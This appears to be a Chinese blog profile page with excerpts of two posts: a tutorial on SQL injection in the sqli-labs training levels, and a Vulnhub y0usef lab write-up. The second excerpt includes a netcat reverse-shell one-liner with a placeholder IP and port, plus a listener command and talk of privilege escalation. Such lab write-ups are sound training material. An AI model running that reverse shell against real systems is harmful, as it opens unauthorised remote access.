- 博客(2)
- 收藏
- 关注
RSS订阅原创 最详细Sqli-labs关卡前十关讲解(手动注入+Sqlmap工具+部分关卡Python脚本注入)
Union联合查询注入第一关:手动注入Sqlmap工具注入第二关:手动注入Sqlmap工具注入第三关:手动注入Sqlmap工具注入第四关:手动注入Sqlmap工具注入布尔盲注第五关:手动注入S
2024-12-02 23:15:33
549
1
原创 Vulnhub--y0usef靶场漏洞多种方法详解复现
rm /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc ip 端口号 >/tmp/f。目录下,找到一个txt文件和一个目录,目录中没什么能利用的,双击点开txt文件中有一串编码字符,经验知是base64的编码(然后在kali中开启监听,nc -lvp 端口号,开启后,再访问一下页面,返回kali发现没有反弹成功。发现是普通用户,尝试提权,发现权限不够,尝试用python命令调用本地shell,,发现是普通用户,尝试提权,方法就跟刚才的本地提权一样的方法,这里我就不演示了。
2024-10-13 15:55:06
1475
1
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人